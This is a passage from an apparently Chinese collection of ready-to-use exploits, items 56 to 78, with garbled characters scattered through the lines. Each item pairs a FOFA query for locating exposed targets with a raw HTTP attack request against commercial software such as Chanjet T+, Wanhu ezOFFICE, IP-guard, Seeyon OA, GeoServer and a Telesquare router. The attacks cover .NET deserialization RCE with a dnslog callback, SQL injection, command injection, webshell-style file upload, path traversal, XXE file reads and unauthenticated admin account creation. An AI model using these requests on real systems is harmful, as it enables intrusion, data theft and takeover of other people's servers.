; X3 ?, ^2 c1 Z9 P" K( P2 m56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
2 R3 E: E0 m$ m, V3 @FOFA: app="畅捷通-TPlus"
8 ^. }. X2 y* ~( jPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
9 |5 b% R' o" c4 r4 A" \Host: x.x.x.x( g1 t+ t2 t: f# \1 u7 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# Q# M% o- R/ q. c# VContent-Type: application/json
: A  ^' G# d, n5 ?. B" @8 `: l$ S+ l: b2 c: L) y1 q" T
{
' ?1 L* V5 V7 _  "storeID":{% h( `" X' _' S% b% r# Z' I2 }
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
& ]& G9 b: Y( b* W# I   "MethodName":"Start",6 X8 k4 E' R  m( }$ Q( G
    "ObjectInstance":{
/ N2 w. J5 t: j, a( e' a4 Z* m       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% c" A. F# J  \! c, x% y' K
        "StartInfo": {
1 x* N1 L; l: P5 Y+ n           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# i' E0 O: H3 k           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
, k' K: o! w3 a! c# U; `% e       }
/ J( M8 i; U4 v8 o  Q  [6 Y    }
: J- u0 w; l' @* {* Y" S. l  }
4 _7 M* J5 |: C& e}; U* \* A+ g( I% Y9 U

8 \, ~! S0 Y6 f
9 d. E$ R  C/ d, ^8 a9 f$ L57. 畅捷通T+ keyEdit.aspx SQL注入1 A  a' z6 w% k/ @! A) l1 x5 l
FOFA:app="畅捷通-TPlus"
7 E, j' Y" v0 _1 `; ~GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
6 H0 j6 x* Q+ D2 ?Host: host
5 V, r2 |3 p. L7 m/ ^) P) WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 B' m) D9 N5 G
Accept-Charset: utf-8
8 F# Q8 q3 H7 `/ T! b9 KAccept-Encoding: gzip, deflate0 [* I$ k# u( B" ~. R
Connection: close* Q2 x  s/ @3 {/ B7 ^
% E2 H0 R4 D/ o% o& J2 I8 }% N  Q
# R4 o: t1 ?/ o* e! q- w. s
58. 畅捷通T+ KeyInfoList.aspx sql注入: Q. W, J6 C5 _5 p6 _/ X7 \
FOFA:app="畅捷通-TPlus"3 u" P5 Y/ G: n9 z
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1: M- r. r% i$ i3 t
Host: your-ip) n4 y$ ]7 T- ]9 Z* q* W
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* ^( K3 N  q! C1 ]Accept-Charset: utf-8
3 T+ r: ^- e. \6 Z7 o' M% hAccept-Encoding: gzip, deflate
7 w# F4 e! M, ^- \Connection: close3 F0 U4 N9 J# w, j: c
4 z0 I" u$ [3 r2 Q3 c$ }
8 E, V9 l8 F$ B, L* n1 a
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, m2 A& U! T% GFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
8 \- H8 M# C* v; lPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
  g; e" P% L; T& g/ A. {( @Host: 192.168.86.128:9090
8 Q6 B2 p& R8 z* I' ^5 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 r% t  l" p" I" jConnection: close4 F" w4 ^' F3 q: E1 I
Content-Length: 16698 C" J  R, u8 b( c/ U6 c: s, H
Accept: */*8 Y0 {' M/ W7 N
Accept-Language: en: C: N# I" g" a6 Z$ f/ |
Content-Type: application/x-www-form-urlencoded2 V: j# n7 G: X5 O4 w! o, M
Accept-Encoding: gzip" Q8 d$ q# V- W+ ^+ k

' E& s+ L" w* N6 ]3 I" I# OPAYLOAD
" r% z0 W$ [  h7 j
' w3 O0 ^/ ?3 S' X4 ?6 l/ x% T0 K9 W+ d* [3 l3 ^
60. 百卓Smart管理平台 importexport.php SQL注入
4 G) A1 S. b- @7 X6 E: T% QFOFA:title="Smart管理平台"
9 p& j: [) P! O$ n7 {$ vGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1! K3 P2 r4 n% u7 W
Host:
& w& I( A8 C9 Q  N8 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 W- w: _# H! @6 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# ^$ y- i: h1 K5 o; @& @
Accept-Encoding: gzip, deflate, m3 _" o" n3 S7 O
Accept-Language: zh-CN,zh;q=0.9
5 t7 ^$ c: k3 \+ n6 b; \6 CConnection: close
+ E5 ^! _! y. u* _# R3 x9 t+ D/ R2 l( x& U9 n( F+ C& x
6 d1 r6 F6 n+ t) {2 d5 ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 k& G# A+ D! Q8 uFOFA: title="欢迎使用浙大恩特客户资源管理系统"
9 ^, K0 o* o/ n- ?: N8 _) W* B% cPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1" g- o* q' j" p- ~$ ?) L# z
Host: x.x.x.x$ s5 ^- N0 F  q$ ^: Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 a$ L8 C# S% i6 H3 L+ ~
Connection: close% g. z- t* J: C8 v6 ]
Content-Length: 27
5 k1 G( Z, H/ ?$ h, [( |( G. N3 YAccept: */*- `' f# u. h, C/ a& @
Accept-Encoding: gzip, deflate
* t1 u3 M# H. v0 \6 E& V" Z* sAccept-Language: en% c) c, K  [+ W
Content-Type: application/x-www-form-urlencoded
% d4 R1 ^0 a3 b- b  U7 ^3 Y$ K1 S" h1 S4 A( j
8uxssX66eqrqtKObcVa0kid98xa$ Q* G4 X% M6 |3 y
: f4 F  Z$ ]2 S& h6 t" X) d

8 x+ U; `% R% ~6 ~) G3 ^) C" f62. IP-guard WebServer 远程命令执行) K% S' O1 R. t5 Y
FOFA:"IP-guard" && icon_hash="2030860561"
: X+ P8 s( X8 m( o$ a# \GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
% I- j4 k) z1 Z& v& vHost: x.x.x.x+ Y) }# d- o/ F' z8 a$ Z- b# m: o5 J
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.361 m. w3 C8 F  \$ v# `
Connection: close4 a7 x3 ?/ c* P/ c4 I
Accept: */*0 i& C/ q9 u3 E! z# E4 a$ H
Accept-Language: en
: a2 _- Q5 I  w. o8 D+ MAccept-Encoding: gzip
' `( {; m6 p# S( c" f
* z% r0 @, A6 D/ s7 g
9 u, k5 y3 l# t3 o访问
# J: m- R7 s/ \+ f- Y' D% s
7 D4 ?( D% K- Q2 ?4 @1 FGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1# S  ^: Y* t+ t# K
Host: x.x.x.x
" I  a  m- s6 `. O+ [* w
5 q+ ]) F: o8 y, }1 L1 v3 M( }% V& r0 U4 L
63. IP-guard WebServer任意文件读取8 u4 b- v( }5 @) k
IP-guard < 4.82.0609.0
! @9 _, }$ n- r# w. D) _7 r- S+ RFOFA:icon_hash="2030860561"
" R4 T5 }$ _$ e: A! r8 }POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1+ X) l! U. Z' P% J  K
Host: your-ip
& b$ m3 m: I; |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, ~6 \, X. ^5 Y. q7 h! P& H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) `6 k' \. Y: O3 j$ ^4 ^  q! H
Accept-Encoding: gzip, deflate# q5 Q9 s2 h" D* A, l( G* e0 y
Accept-Language: zh-CN,zh;q=0.9
* @2 ?0 \% r& K" s8 F) cConnection: close
5 ^- _. i# e& c$ A* r7 SContent-Type: application/x-www-form-urlencoded
3 i9 z. g  |  |; T8 `% f' Z6 v/ Q1 y0 q" Z" o# Y' X! I( h
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A( V3 u7 Q) `5 p  {9 \: e

% e  f: v0 N: E/ ~4 j0 l64. 捷诚管理信息系统CWSFinanceCommon SQL注入
7 {! I% A" i5 _8 H9 \/ mFOFA:body="/Scripts/EnjoyMsg.js"
0 m8 e9 o' Q1 R- x# wPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
0 i; `0 I6 }. R8 FHost: 192.168.86.128:9001
0 G  Y& v. j5 J4 R+ D& L6 x( uUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
$ W3 \; W% a4 P1 u' rConnection: close
. G7 z9 f4 D% |3 k. g- E9 oContent-Length: 369
  E+ U, D% h9 b7 F8 W6 IAccept: */*0 `) d$ c  X6 Z. V5 I
Accept-Language: en
& c5 Q* a( S* O$ i9 D' O0 OContent-Type: text/xml; charset=utf-8
) x& C7 s5 t/ C! ^% IAccept-Encoding: gzip
5 q) I/ ^7 J2 E5 _5 b
! F% z% a4 r/ G9 U0 u) z" m6 f2 ~<?xml version="1.0" encoding="utf-8"?>- k" ]. A1 j8 c5 F4 v5 T7 b* q! b
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 h  f' \$ A! I2 o1 A<soap:Body>
* v1 ^4 o- I) u, i: ^, z    <GetOSpById xmlns="http://tempuri.org/">2 [* t8 a3 h9 W% M+ x# r6 [
      <sId>1';waitfor delay '0:0:5'--+</sId>
* V, Y) S) z' I0 j% h0 [- T- m    </GetOSpById>* V: v: ]$ T# B: w
  </soap:Body>5 V4 y2 d  w/ k& S8 q) ?
</soap:Envelope>2 s5 a& m' \, w: Z1 O, O( M
  P9 h, s, E! x0 R( u% u
( N" ~+ T* e) x
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" m  _* b: U1 w* |- b+ m7 p
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
. K4 U! A% v/ w) [0 L) N响应200即成功创建账号test123456/123456
0 @3 _: t' K/ ]) P! P& M5 SPOST /SystemMng.ashx HTTP/1.15 R- c6 e: I. u7 H0 N
Host:
* P  C4 t& j! T5 A& B% [User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)$ S; e, z4 P* V6 I' z
Accept-Encoding: gzip, deflate" y, w& z$ g$ p- v2 p/ u
Accept: */*
) k$ B$ b3 A, [3 m$ _% wConnection: close; Q0 Z( |4 b' V1 `8 E4 Y: z
Accept-Language: en* s/ Q: c8 a. \5 v( z( A: c" W
Content-Length: 174
: N: s7 K: A) C- F/ g' J. h% v% Y# G7 W- F9 H( r6 r
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
/ R4 ~# x3 s- _  ]( |; I
4 I1 y5 u; U  m0 R. |7 Y4 C3 p  _  G
& K$ j6 P7 L; l66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* ^. g0 S- q* d& N2 B5 ?# vFOFA:app="万户ezOFFICE协同管理平台"
+ g  @' B) T/ u5 r- C, H/ y1 |
. C( n: i' ]1 v4 v# GGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
! O, H/ D6 r& f, Q5 KHost: x.x.x.x& L6 y; u! n+ O' D1 \; M3 T: P# b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 D9 j0 O1 H  f$ O+ U8 s* }
Connection: close
2 ]) B  r$ M: M3 |- IAccept: */*$ q! O! m3 W+ X- F/ d9 c* E
Accept-Language: en
, _: V" z( W% B+ @9 t" n4 Y) tAccept-Encoding: gzip
( @9 t+ E% B6 [+ v9 B* i/ @' z" e0 |7 o% w; ^9 c) [" C0 o- g

7 P) F# F0 f+ Y' L. `第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ d* a- [/ J0 l, R

- G5 n* s8 Y7 T5 {) D67. 万户ezOFFICE wpsservlet任意文件上传
. n; x+ @% O9 o3 D& r2 RFOFA:app="万户网络-ezOFFICE"" ?% O+ V7 c) a* G2 A& N
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型7 s+ S0 J! }( J& }$ e8 }
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1* a* d: n2 P! i9 w
Host: x.x.x.x
. E( K8 Q1 h  v2 r& BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
& A/ U5 E5 Z. ]$ H& TContent-Length: 173' {; f9 r; Z( x- t; `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
* v* p: U0 b% t. [- [7 E" U! fAccept-Encoding: gzip, deflate
9 o! k8 U/ b- t* a9 E: U  CAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
4 @, Q& x6 U! @- eConnection: close
) n, u; P* @! Z# F+ i0 aContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp1 i6 w3 t9 t/ L3 ~6 _* U! g6 N+ u9 ]! F8 b) N
DNT: 12 s' ]- [+ p8 j. p) H
Upgrade-Insecure-Requests: 1) Y6 x1 Z* n. A  F" J' _2 v

6 H6 x% H7 L; K# E9 u--ufuadpxathqvxfqnuyuqaozvseiueerp
8 W: K6 y& `+ v1 E& u  H% sContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
. l- q( Z2 p- }5 L" u1 ^) J- p& u+ z" n" m" q2 S
<% out.print("sasdfghjkj");%>
% I1 M* z& }& X. D8 l3 C--ufuadpxathqvxfqnuyuqaozvseiueerp--) ~" j2 `/ j) P# U; {
* _0 q; V5 c2 \  V! A6 z
5 i5 K. q; r, M  ]
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp, F2 Q: G# g4 G, V( }4 H8 `

" j- L9 C+ ^8 g& j( P" M" J68. 万户ezOFFICE wf_printnum.jsp SQL注入
5 h4 f- J3 _5 J5 FFOFA:app="万户ezOFFICE协同管理平台"
  M( s/ R5 f0 V( v5 E( UGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
, p9 W6 e4 {' P7 ]Host: {{host}}2 ]; }3 U! \! E  W3 |/ [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
8 N1 j# z0 g% c1 bAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
8 O$ M% W! ^- i" xAccept-Encoding: gzip, deflate9 b6 p) T6 T* U
Accept-Language: zh-CN,zh;q=0.9
9 V  z7 ^- K# `9 p% u, k& GConnection: close
9 L4 F6 G8 ]6 j% Z' u$ N+ k3 T
4 m; V7 C5 l- _- u
  C" v6 _% r. o# ]9 Y' |69. 万户 ezOFFICE contract_gd.jsp SQL注入2 b  n# U8 h  w! S1 Q4 u" M! y
FOFA:app="万户ezOFFICE协同管理平台"
* ?2 C7 L& ]* PGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.15 j2 R" ~9 _, i" b  I! g
Host: your-ip/ ?  B- h+ c) e
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 S8 J  _) n3 W
Accept-Encoding: gzip, deflate
9 H& z) ?# [& D  T6 X% pAccept: */*! F* o% G% f- L3 [
Connection: keep-alive; Z! p& E' w! ]# M
) a5 r* a6 p0 m2 E+ t

$ B3 [8 T) Q8 y, x) \* ~) A$ ^) \70. 万户ezEIP success 命令执行) s3 O! V0 f& D0 A! v$ Y1 P
FOFA:app="万户网络-ezEIP"
! H9 t. j/ M+ `  jPOST /member/success.aspx HTTP/1.1& Z. P) Y4 J1 n5 q' Z2 K& p# x
Host: {{Hostname}}
% w4 }4 l1 C5 \+ o/ W. }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 ~$ M( V5 t6 @! O+ s1 j2 ^$ QSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ }$ g9 X" b) g) {" z3 nContent-Type: application/x-www-form-urlencoded& f& r7 U/ S4 D; f) F% H2 b/ c7 d
TYPE: C
) i# Q7 h8 U2 B) b  GContent-Length: 167024 R5 I7 L: z. \% {
7 \  V. B6 h  v% o$ r  Q
__VIEWSTATE=PAYLOAD7 q' s2 O) }& G7 N, E# P

! p5 |" ^! E! G! e" M% j% m; n6 F
0 M: N( Q% k0 q1 Y9 j7 z1 _71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* A5 y' A! W# M% K1 j' O7 {1 s6 _
FOFA:body="PM2项目管理系统BS版增强工具.zip"3 E0 s3 W( B) z) s# u' z+ [
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
, f  v# i0 v4 [& P# {4 O6 ~7 P3 nHost: x.x.x.xx.x.x.x6 H/ w: p7 Y$ k1 w) T7 F
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36( }4 O: N( ?! n! p/ g" [1 m
Connection: close; S! V0 R0 k2 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 y: `5 o6 K5 T7 l5 D6 _: [8 p* BAccept-Encoding: gzip, deflate1 Q) L' Z. q0 p: r( o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  _3 O6 o1 P: o5 d( L. o/ j/ ]Upgrade-Insecure-Requests: 1- ^; E$ B' ~8 s" |7 t

$ z/ p' j" N3 N4 C) ?7 O& U$ d" Q& a9 Q9 P
72. 致远OA getAjaxDataServlet XXE
* C2 W# h7 o  f. Z( RFOFA:app="致远互联-OA"6 G! l. ~3 w2 x
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1% b1 J6 u5 P! p4 o+ K' ~+ Y
Host: 192.168.40.131:8099
/ Y$ W, h) C; {- qUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
: ?) y; s, U8 n" T& LConnection: close
2 u4 m8 W/ y3 U' s0 ?! n6 ]" @Content-Length: 583/ k6 }/ s( }& c
Content-Type: application/x-www-form-urlencoded
% q, o* B. l; t; H, V' ?Accept-Encoding: gzip. l- f9 X: M/ H! `* C
3 d& w' l- P# p5 s
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E) T' S4 m  C. m- s: N
% k6 D8 u5 p- [( B
; n' f# J' d" _; J* P: \& V
73. GeoServer wms远程代码执行, Z6 ~. z2 X4 `  n4 O( b
FOFA:icon_hash=”97540678”# N8 @8 M% z! R
POST /geoserver/wms HTTP/1.1
& y8 z: Z+ R: N- e6 E% hHost:8 M, Y4 l9 X+ F" y; g/ o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 b, X2 K' Z6 \3 U; G% s
Content-Length: 1981' h: I8 M" R% A- U' }; p0 [7 r
Accept-Encoding: gzip, deflate9 u, S! i9 B8 e  T
Connection: close
0 T6 N! S" c* T+ i; G6 f1 eContent-Type: application/xml
' E' p* B) ^, L1 j7 o% D4 fSL-CE-SUID: 3
  l; F# [5 z3 }# N; [6 l" \: C7 S% V& e9 Q9 l3 M3 ]. H' o; b3 {
PAYLOAD
  j- F6 i$ u0 L  A
3 {- ~$ T5 o# P6 k6 T$ o. ?0 K1 ]& C, ^% }
74. 致远M3-server 6_1sp1 反序列化RCE
4 N! e  h( v! n  z! n% }) kFOFA:title="M3-Server"
4 {' B9 g: q: `PAYLOAD
+ ]' L; T# D+ X9 o. ]3 m. U$ M' c: d) e- z6 e  c: [
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
$ U" i, H+ E# Z5 D+ QFOFA:app="TELESQUARE-TLR-2005KSH"+ j' E% Q* |4 x/ {- V
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
) u8 {8 d9 |2 ]& e5 d6 [6 ^Host: x.x.x.x
6 E2 D. S; a0 `7 b  hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! f3 G* e7 g2 Z3 z/ V8 s
Connection: close) O0 q! {7 v+ C2 |
Accept: */*7 h3 ^. O1 k. s+ L
Accept-Language: en
4 `2 n5 g0 R! i$ l2 k# O! PAccept-Encoding: gzip
& N$ B: k- k* ^" e  ~# p2 h# P: j1 w8 d, B  }' H

8 T0 O3 X4 ]& u0 b. e8 s) Y$ BGET /cgi-bin/test28256.txt HTTP/1.1, I% Y9 L/ E  Q, o6 s/ I" b: u
Host: x.x.x.x2 x2 u/ m& T& q4 l: {# r9 o  y
5 Y  z) l* t1 S3 a9 v: c3 @/ s
+ J" S. W; q) j) P6 x5 \* `( a- x
76. 新开普掌上校园服务管理平台service.action远程命令执行1 g* K3 j4 ~3 @/ |, R- N
FOFA:title="掌上校园服务管理平台"
7 Y* |6 O% Q7 F, hPOST /service_transport/service.action HTTP/1.1
3 I5 h. L( _) f+ ^4 X4 K: J8 f7 dHost: x.x.x.x2 L) @! Y5 Y: \: V& V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; r- T/ U& q- A5 X! [% Z! D
Connection: close4 ]. j- P, B  f1 v
Content-Length: 211$ @0 L# p# Q% l+ L7 l9 r8 m6 g/ H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 i2 n$ x* r5 D, E9 M# e
Accept-Encoding: gzip, deflate6 ?' E0 }6 V( N$ O' \0 r( ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& H! T, @: w+ R" x) R0 n, k  fCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
# p2 ~% ^# L+ `* ?Upgrade-Insecure-Requests: 1) J5 c# l% e- p8 [* O& o

* Z* g; O5 T$ t$ S8 T{
9 K2 U: D7 z, p5 T"command": "GetFZinfo",2 _" J/ [" ^( r8 r7 K0 Z
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
3 d& r- s$ D6 X" ^4 Y' I  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"2 |) x/ M) m- _: g. u. M/ g
}/ |9 T1 a! |$ e4 G: T" ?( d8 t- k
+ H" C( [7 U' V/ k4 r4 @1 \& N: j1 s
9 T. i/ Z8 S6 o
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.13 i! m. U4 ~% c  m; V2 M' E
Host: x.x.x.x
* J- L! L2 B/ r  H, K7 ?' f& c$ ~% p% d& |6 w$ P* j( S3 q* k. S
; M1 z; R  K' U& t+ P- n2 c
+ v" y6 u, t8 W, o1 n) X7 H
77. F22服装管理软件系统UploadHandler.ashx任意文件上传( k& v: L: s" U' p) v
FOFA:body="F22WEB登陆"8 M8 ^& _. T6 |, E4 }
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
$ ?) g+ N  P$ A# y/ Z5 gHost: x.x.x.x
0 \0 J( ?; ]( F5 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  y# a  G: @" g; u
Connection: close
* w: A7 r& Y6 P+ M: aContent-Length: 433
2 F8 r, i' X* o$ G  I: xAccept: */*
, H1 f! V" R; m; ?Accept-Encoding: gzip, deflate
! |$ m1 H# ?: P% c  w# Q) B* qAccept-Language: zh-CN,zh;q=0.9$ y0 ?% `$ J7 k/ i
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
. ^% I& ^: r; k3 T9 Q# i& @$ s/ x, z  X6 q! L4 B9 H
------------398jnjVTTlDVXHlE7yYnfwBoix
% @9 y% Z5 w% y: j- w5 x% t1 gContent-Disposition: form-data; name="folder"
* V, l  L* {: b. q" c6 _% b: y7 \4 C! X, l# x
/upload/udplog! N* J- C* G0 y7 ~3 [
------------398jnjVTTlDVXHlE7yYnfwBoix
) ]) V& E) j) N9 {Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
5 {1 |$ H: C0 R$ zContent-Type: application/octet-stream
8 R4 a8 u- P" r9 r. d3 w0 H, ^4 _5 b; h
$ B/ v6 M1 k* Q8 Q9 b! Hhello1234567
0 g' Y0 _0 ]3 t9 ]1 ^------------398jnjVTTlDVXHlE7yYnfwBoix
7 G0 V3 @; o6 R0 ]. M3 x2 z$ F) LContent-Disposition: form-data; name="Upload"/ K) d& H: M& @8 T7 V
( V  x8 `4 e6 T0 q( x  q
Submit Query+ L2 d5 S8 \* p& _
------------398jnjVTTlDVXHlE7yYnfwBoix--& u% ^# K  C. Y4 r" u
1 F  x3 j3 P7 w2 e9 ^  W# R
# H5 P: O# c0 l( w
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, N6 t0 M) d9 h7 E/ Q
FOFA:icon_hash="2001627082"
0 {' T; v1 X- P- n5 gPOST /Platform/System/FileUpload.ashx HTTP/1.1
3 P) p& C, }& @Host: x.x.x.x
( b. t* l. G8 ^% A; VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ C4 {3 r: H% }Connection: close
% c! q, Q6 a8 o2 tContent-Length: 336- x' N! T( b1 g5 c9 C6 n, g  k
Accept-Encoding: gzip) T. m  G- {. \: M/ d
